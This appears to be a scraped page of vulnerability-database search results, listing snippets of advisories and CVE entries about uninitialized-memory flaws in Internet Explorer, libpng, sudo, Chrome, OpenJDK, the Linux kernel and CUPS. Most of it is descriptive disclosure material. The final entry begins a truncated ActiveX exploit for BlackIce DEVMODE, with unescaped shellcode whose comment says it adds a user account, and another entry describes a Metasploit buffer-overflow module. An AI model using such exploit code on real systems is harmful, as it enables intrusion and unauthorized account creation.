Microsoft IE未初始化内存远程代码执行漏洞（MS10-018）

BUGTRAQ ID: 39023,39031 CVE ID: CVE-2010-0267,CVE-2010-0490 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 Internet Explorer访问尚未正确初始化或已被删除的对象的方式中存在多个远程执行代码漏洞。攻击者可以通过构建特制的网页来利用该漏洞，当用户查看网页时，该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。 Microsoft Internet Explorer 8.0 Microsoft Internet Explorer 7.0...

Ubuntu Update for libpng vulnerabilities USN-913-1

Ubuntu Update for Linux kernel vulnerabilities USN-913-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN9131.nasl 7965 2017-12-01 07:38:25Z santu $ Ubuntu Update for libpng vulnerabilities USN-913-1 Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH,...

Ubuntu: Security Advisory (USN-913-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

USN-913-1: libpng vulnerabilities

It was discovered that libpng did not properly initialize memory when decoding certain 1-bit interlaced images. If a user or automated system were tricked into processing crafted PNG images, an attacker could possibly use this flaw to read sensitive information stored in memory. This issue only...

CentOS 5 : sudo (CESA-2010:0122)

An updated sudo package that fixes two security issues is now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. The sudo superuser do utility allows system administrators to give certain users the abilit...

RHEL 5 : sudo (RHSA-2010:0122)

An updated sudo package that fixes two security issues is now available for Red Hat Enterprise Linux 5. This update has been rated as having important security impact by the Red Hat Security Response Team. The sudo superuser do utility allows system administrators to give certain users the abilit...

CVE-2010-0663

The ParamTraits::Read function in common/commonparamtraits.cc in Google Chrome before 4.0.249.78 does not initialize the memory locations that will hold bitmap data, which might allow remote attackers to obtain potentially sensitive information from process memory by providing insufficient data,...

CVE-2010-0663

CVE-2010-0663 refers to Google Chrome prior to 4.0.249.78, where the ParamTraits::Read function in common/common_param_traits.cc does not initialize memory for bitmap data. This could allow remote attackers to obtain potentially sensitive information from process memory, related to use of a thumb...

OpenJDK remote LDAP Denial-Of-Service (6717680)

LdapCtx in the LDAP service in Java SE Development Kit JDK and Java Runtime Environment JRE 5.0 Update 17 and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.124 and earlier; and 1.4.219 and earlier does not close the connection when initialization fails, which allows remote attackers to cause ...

phpwind 7.5 apps/groups/index.php远程包含漏洞

apps/groups/index.php 里$route和$basePath变量没有初始化,导致远程包含或者本地包含php文件,导致执行任意php代码 ?php if $route == "groups" requireonce $basePath . '/action/mgroups.php'; elseif $route == "group" requireonce $basePath . '/action/mgroup.php'; elseif $route == "galbum" requireonce $basePath . '/action/mgalbum.php';...

CentOS 5 : kernel (CESA-2007:0347)

Updated kernel packages that fix security issues and bugs in the Red Hat Enterprise Linux 5 kernel are now available. This update has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel handles the basic functions of the operating system. These n...

OpenJDK remote LDAP Denial-Of-Service (6717680)

LdapCtx in the LDAP service in Java SE Development Kit JDK and Java Runtime Environment JRE 5.0 Update 17 and earlier; 6 Update 12 and earlier; SDK and JRE 1.3.124 and earlier; and 1.4.219 and earlier does not close the connection when initialization fails, which allows remote attackers to cause ...

RedHat Security Advisory RHSA-2009:1522

The remote host is missing updates announced in advisory RHSA-2009:1522. The kernel packages contain the Linux kernel, the core of any Linux operating system. This update fixes the following security issues: multiple, missing initialization flaws were found in the Linux kernel. Padding data in...

Mandrake Security Advisory MDVSA-2009:281 (cups)

The remote host is missing an update to cups announced via advisory MDVSA-2009:281. SPDX-FileCopyrightText: 2009 E-Soft Inc. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only OR...

kernel security update

CentOS Errata and Security Advisory CESA-2009:1522 Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Updated 21st July 20...

kernel: netlink: fix numerous padding memleaks

The netlink subsystem in the Linux kernel 2.4.x before 2.4.37.6 and 2.6.x before 2.6.13-rc1 does not initialize certain padding fields in structures, which might allow local users to obtain sensitive information from kernel memory via unspecified vectors, related to the 1 tcfillqdisc, 2...

CA eTrust PestPatrol ActiveX Control Buffer Overflow

This module exploits a stack buffer overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize property of ppctl.dll 5.6.7.9 an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...

PT-2009-4929 · Microsoft · Windows Media Runtime

Name of the Vulnerable Software and Affected Versions: Microsoft Windows Media Runtime affected versions not specified Description: The issue is related to the improper initialization of unspecified functions within compressed audio files. This allows remote attackers to execute arbitrary code vi...

Microsoft Active Template Library (ATL) multiple security vulnerabilities

Memory corruptions, information leak, initialization problem, leading to killbit protection bypass...

Oracle - Document Capture BlackIce DEVMODE

var devmode = new ActiveXObject"BLACKICEDEVMODE.BlackIceDEVMODECtrl.1"; //user add, user: sun pass: tzu scode = unescape "%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +...